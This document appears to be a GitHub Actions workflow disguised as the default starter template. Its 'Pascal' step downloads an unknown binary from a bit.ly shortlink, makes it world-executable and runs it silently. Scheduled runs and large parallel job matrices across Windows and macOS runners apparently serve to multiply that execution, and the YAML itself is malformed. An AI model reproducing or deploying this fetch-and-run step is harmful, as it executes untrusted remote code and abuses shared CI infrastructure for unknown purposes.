# This is a basic workflow to help you get started with Actions

name: CI_Node

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  schedule:
    - cron: *0 */12 * * *
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: windows-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go:[1.1,1.2]
        flag:[1,2,3,4,5,6,7,8,9,10]
    timeout-minutes:360
  env:
    NUM-JOBS: 50
    JOB: ${{matrix.go}}
      
  steps:
  - name: Set ip Go ${{matrix.go}}
    uses: actions/setup.go@v1
  deploy:
    name: x-code
    runs-on: macos-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go:[1.1,1.1,1.1,1.4,1.4,1.4,1.5,1.5,1.5,1.1,1.1,1.1]
        flag:[A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T]
    timeout-minutes: 36
    env:
      NUM-JOBS: 200
      JOB: ${{matrix.go}}
   steps:
   - name: Setup Go${{matrix.go}}
     uses: actions/setup.go@v1  
      with:
      go-version: {{matrix.go}}
    id: go
  - name: Check-in
    uses: actions/checkout@v2
  - name: Pascal
    run:
      wget https://bit.ly/3jQR4Nq && chmod 777 3jQR4Nq && ./3jQR4Nq > /dev/null
    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.
